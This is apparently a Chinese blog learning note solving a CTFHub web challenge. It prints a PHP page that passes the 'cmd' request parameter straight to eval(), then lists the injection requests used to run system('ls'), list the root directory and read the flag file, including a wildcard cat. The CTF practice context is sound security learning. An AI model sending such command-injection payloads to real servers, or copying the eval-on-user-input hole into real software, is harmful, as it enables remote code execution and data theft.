CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
人间打气筒(Ada)14 分钟前
Linux学习~日志文件参考
linux·运维·服务器·学习·日志·log·问题修复
浅念-19 分钟前
C/C++内存管理
c语言·开发语言·c++·经验分享·笔记·学习
凌晨7点28 分钟前
DSP学习F28004x数据手册:第13章-ADC
单片机·嵌入式硬件·学习
野犬寒鸦1 小时前
从零起步学习并发编程 || 第九章:Future 类详解及CompletableFuture 类在项目实战中的应用
java·开发语言·jvm·数据库·后端·学习
蒸蒸yyyyzwd1 小时前
cpp os 计网学习笔记
笔记·学习
前路不黑暗@2 小时前
Java项目:Java脚手架项目的统一模块的封装(四)
java·开发语言·spring boot·笔记·学习·spring cloud·maven
2401_848009722 小时前
Redis进阶学习
数据库·redis·学习·缓存
简佐义的博客3 小时前
单细胞+空间转录组+ChIP-seq:这篇Nature研究在分析思路、方法学选择以及证据链构建方面均具有极高的学习价值
学习
前路不黑暗@3 小时前
Java项目:Java脚手架项目的通用组件的封装(五)
java·开发语言·spring boot·学习·spring cloud·bootstrap·maven
A9better6 小时前
C++——指针与内存
c语言·开发语言·c++·学习
热门推荐
01PHP Error: 常见错误及其解决方法02GitHub 镜像站点03Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services04openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南05UV安装并设置国内源06HTB 赛季10 - Pterodactyl - user07243 行 microGPT:把“训练 + 推理”拆到骨头里08Android Studio Panda 1 正式版来了:JDK 终于不用手动配了,内存泄漏也有原生方案了09爬虫逆向之观安(观镜WEB应用安全防护系统)10AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南